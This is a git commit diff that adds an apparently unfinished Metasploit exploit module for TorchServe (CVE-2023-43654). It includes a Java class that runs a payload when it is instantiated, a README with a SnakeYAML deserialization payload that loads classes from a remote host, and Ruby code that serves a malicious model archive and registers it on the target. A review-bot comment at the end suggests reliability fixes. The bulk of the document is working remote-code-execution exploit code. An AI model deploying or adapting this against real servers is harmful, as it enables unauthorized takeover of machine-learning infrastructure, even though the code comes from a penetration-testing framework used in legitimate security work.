Initial commit of CVE-2023-43654
This commit is contained in:
parent
874366588c
commit
5a6dc7f9a6
BIN
data/exploits/CVE-2022-1471/MyScriptEngineFactory.class
Normal file
Binary file not shown.
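--- /dev/null
+++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
@@ -0,0 +1,72 @@
+// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+import java.io.IOException;
+import java.util.List;
+import metasploit.*;
+
+public class MyScriptEngineFactory implements ScriptEngineFactory {
+public MyScriptEngineFactory() throws Exception {
+Payload.main(null);
+}
+
+@Override
+public String getEngineName() {
+return null;
+}
+
+@Override
+public String getEngineVersion() {
+return null;
+}
+
+@Override
+public List<String> getExtensions() {
+return null;
+}
+
+@Override
+public List<String> getMimeTypes() {
+return null;
+}
+
+@Override
+public List<String> getNames() {
+return null;
+}
+
+@Override
+public String getLanguageName() {
+return null;
+}
+
+@Override
+public String getLanguageVersion() {
+return null;
+}
+
+@Override
+public Object getParameter(String key) {
+return null;
+}
+
+@Override
+public String getMethodCallSyntax(String obj, String m, String... args) {
+return null;
+}
+
+@Override
+public String getOutputStatement(String toDisplay) {
+return null;
+}
+
+@Override
+public String getProgram(String... statements) {
+return null;
+}
+
+@Override
+public ScriptEngine getScriptEngine() {
+return null;
+}
+}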
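--- /dev/null
+++ b/external/source/exploits/CVE-2022-1471/README.md
@@ -0,0 +1,17 @@
+# Overview
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
+CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+## Compiling
+Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+
+## Usage
+Trigger the deserialization using the following YAML:
+```yaml
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+```
+
+Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
+contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
+`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
+deliver a Metasploit payload.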
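--- /dev/null
+++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Java
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+# prepend Msf::Exploit::Remote::AutoCheck
+
+def initialize(_info = {})
+super(
+'Name' => '',
+'Description' => %q{
+
+},
+'Author' => [
+'Spencer McIntyre'
+],
+'References' => [
+[ 'CVE', '' ],
+],
+'DisclosureDate' => '',
+'License' => MSF_LICENSE,
+'DefaultOptions' => {
+'RPORT' => 8081
+},
+'Targets' => [
+[
+'Automatic', {
+'Platform' => 'java',
+'Arch' => [ARCH_JAVA]
+}
+],
+],
+'Notes' => {
+'Stability' => [CRASH_SAFE],
+'SideEffects' => [IOC_IN_LOGS],
+'Reliability' => [REPEATABLE_SESSION]
+}
+)
+end
+
+def class_name
+'MyScriptEngineFactory'
+end
+
+def constructor_class
+::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))
+end
+
+def on_request_uri(cli, request)
+agent = request.headers['User-Agent']
+vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
+
+if request.relative_resource.end_with?('.mar')
+send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })
+return
+end
+
+if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')
+send_response(cli, class_name, {
+'Content-Type' => 'application/octet-string',
+'Connection' => 'close',
+'Pragma' => 'no-cache'
+})
+return
+end
+
+super(cli, request)
+end
+
+def generate_mar
+mri = Rex::Zip::Archive.new
+mri.add_file('model.pt', '')
+mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({
+'createdOn' => '04/10/2023 16:23:53',
+'runtime' => 'python',
+'model' => {
+'modelName' => @mar_filename.delete_suffix('.mar'),
+'serializedFile' => 'model.pt',
+'handler' => 'image_classifier',
+'modelVersion' => '1.0',
+'configFile' => 'config.yml'
+},
+'archiverVersion' => '0.8.2'
+}))
+mri.add_file('config.yml', %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] ))
+mri.pack
+end
+
+def exploit
+@classloader_uri = start_service
+
+@mar_filename = rand_text_alphanumeric(rand(8..15)) + '.mar'
+send_request_cgi({
+'method' => 'POST',
+'uri' => '/models',
+'vars_get' => { # *must* be vars_get and not vars_post!
+'url' => "#{get_uri}#{@mar_filename}"
+}
+})
+handler
+end
+end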
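Review bot: The POST to `/models` in `exploit` (end of the section) discards the response, so a target that is unreachable or rejects the model registration still falls through to `handler` and waits for a session that will never arrive; capture it as `res = send_request_cgi(...)` and add `fail_with(Failure::Unreachable, 'Target did not respond to the model registration request') if res.nil?`, followed by a check on `res.code` once the success code TorchServe returns for this request has been confirmed. In `on_request_uri` the service-file response is sent with `'Content-Type' => 'application/octet-string'`, which is not a registered media type; the `.mar` branch just above uses `application/octet-stream` and the two should agree. The module metadata is also still empty (`'Name' => ''`, blank description, `[ 'CVE', '' ]`, `'DisclosureDate' => ''`) and `AutoCheck` is commented out with no `check` method, so this is not landable as-is even as an initial commit. `SideEffects` lists only `IOC_IN_LOGS`, yet the request registers a model on the target; if that registration persists on the server it likely warrants `CONFIG_CHANGES` or `ARTIFACTS_ON_DISK` as well, which is worth confirming.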